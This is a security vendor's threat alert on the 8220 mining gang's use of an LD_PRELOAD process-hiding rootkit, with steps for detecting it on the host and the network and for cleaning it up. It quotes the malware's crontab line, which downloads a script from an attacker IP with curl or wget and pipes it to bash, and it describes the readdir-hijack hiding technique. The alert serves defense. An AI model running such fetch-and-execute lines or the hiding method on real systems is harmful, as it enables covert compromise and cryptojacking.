Threat Alert | Evolution of the 8220 mining gang: the rise of the mining rootkit trend

The Alibaba Cloud security team recently found that the 8220 mining gang, in order to stay resident on compromised hosts for longer and maximize its profit, has started using rootkit techniques to hide itself. We expect this kind of self-hiding to spread and evolve across mining worms and other malware families, and that hiding versus detection on the host side will become the mainstream battleground.

Background

The Alibaba Cloud security monitoring platform noticed an update to the 8220 mining gang's worm download script: besides the persistence script and the mining program it already fetched, it now also downloads a shared object: http://107.174.47.156/1.so.

The 8220 mining gang is a domestic (Chinese) group that has been active for a long time, exploiting multiple vulnerabilities to deploy mining programs [1-2]. It combines the WebLogic XMLDecoder deserialization vulnerability (CVE-2017-10271), Drupal RCE (CVE-2018-7600), the JBoss deserialization command execution vulnerability (CVE-2017-12149) and other vulnerabilities to compromise hosts and deploy miners for profit.

A brief analysis of the script and the .so file confirmed that the 8220 gang has incorporated ProcessHider [3] into its attack toolset to hide itself. ProcessHider is a rootkit technique already used by numerous malware families. With it, the mining process becomes hard for administrators to find by conventional means, which prolongs its survival on the host and maximizes mining revenue. Over time we expect more and more mining worms to add rootkit functionality.

Worm detection

If the cloud console shows a sharp rise in CPU usage and the machine is sluggish overall, but after logging in you cannot locate the CPU-hungry process with ps or top, the machine has very likely been infected by a mining worm that hides itself with this kind of rootkit.

1. Host detection

The worm uses the LD_PRELOAD mechanism (via /etc/ld.so.preload) to get its .so loaded into every dynamically linked program on the system, and hijacks the readdir function that commands such as ps and top rely on, so those commands no longer return the real process list. Users of the affected system commands therefore cannot see the real processes.

(Figure: screenshot of the hidden process; not reproduced.) As the figure shows, the process the worm hides is named kworkerds.

The worm can be detected with the following commands on the host:

Check the dynamic link libraries:
#ldd /bin/top|grep usr
  /usr/local/lib/libkk.so (0x00007f0f94026000)
An abnormal .so file is present.

Check the preload configuration:
#cat /etc/ld.so.preload
  /usr/local/lib/libkk.so
The preload file has been modified.

Check crontab:
#crontab -l
  */30 * * * *  (curl -s http://107.174.47.156/mr.sh||wget -q -O - http://107.174.47.156/mr.sh)|bash -sh
A strange scheduled task has appeared in crontab.

Viewing the processes with the regular top command shows nothing unusual (figure not reproduced).

LD_PRELOAD only takes effect for dynamically linked programs, so running a statically compiled busybox top is enough to see the real process list (figure not reproduced).

2. Network detection

As the confrontation escalates, the self-hiding features of mining worms will keep improving. Against such heavily armed worms, an ordinary user fighting on the host side pays a very high cost for little return. Such worms are detected far more efficiently on the network side, using NTA (Network Traffic Analysis): no matter what hiding technique the attacker uses on the host, the remote download, C&C communication and mining-pool traffic all leave traces in the network traffic.

The figure below shows the Cloud Firewall record of this worm, in which the infected host was detected downloading the backdoor file (figure not reproduced).

Remediation steps

1. Since the local commands may already be hijacked, first download a statically compiled busybox and use it to run the remediation commands, so that the steps below are not affected by hijacked system commands.

Download the binary:
#wget https://www.busybox.net/downloads/binaries/1.27.1-i686/busybox
Grant execute permission:
#chmod +x busybox

2. Clean up the dynamic-linker hijack (remove the immutable flag before deleting, otherwise rm fails)

./busybox chattr -i /etc/ld.so.preload 2>/dev/null
./busybox chattr -i /usr/local/lib/libkk.so 2>/dev/null
./busybox rm -f /usr/local/lib/libkk.so 2>/dev/null
./busybox rm -f /etc/ld.so.preload
./busybox touch /etc/ld.so.preload
./busybox chattr +i /etc/ld.so.preload
ldconfig

3. Kill the malicious processes and delete the related files

./busybox ps -ef | ./busybox grep -v grep | ./busybox egrep 'kworkerds' | ./busybox awk '{print $1}' |./busybox sed "s/root//g" | ./busybox xargs kill -9  2>/dev/null
./busybox ps -ef | ./busybox grep -v grep | ./busybox egrep '107.174.47.156' | ./busybox awk '{print $1}' |./busybox sed "s/root//g" | ./busybox xargs kill -9  2>/dev/null
./busybox rm -f /var/tmp/kworkerds
./busybox rm -f /var/tmp/sustse*

4. Repair crontab

./busybox chattr -i /etc/cron.d/root 2>/dev/null
./busybox rm -f /etc/cron.d/root
./busybox chattr -i /var/spool/cron/apache 2>/dev/null
./busybox rm -f /var/spool/cron/apache
./busybox chattr -i /var/spool/cron/root 2>/dev/null
./busybox rm -f /var/spool/cron/root
./busybox chattr -i /var/spool/cron/crontabs/root 2>/dev/null
./busybox rm -f /var/spool/cron/crontabs/root
./busybox rm -rf /var/spool/cron/crontabs
./busybox touch /var/spool/cron/root
./busybox chattr +i /var/spool/cron/root

5. After crontab has been repaired, go back to step 3 and run it once more.

6. When the repair is complete, restart cron:

service crond start

References:

1. Tracing the suspected domestic "8220 mining gang" to its source [https://www.freebuf.com/column/179970.html]

2. Analysis of recent "8220 gang" activity: mining and ransomware Trojans dancing together [https://www.freebuf.com/column/186467.html]

3. https://github.com/gianlucaborello/libprocesshider


Source: yq.aliyun.com/articles/704588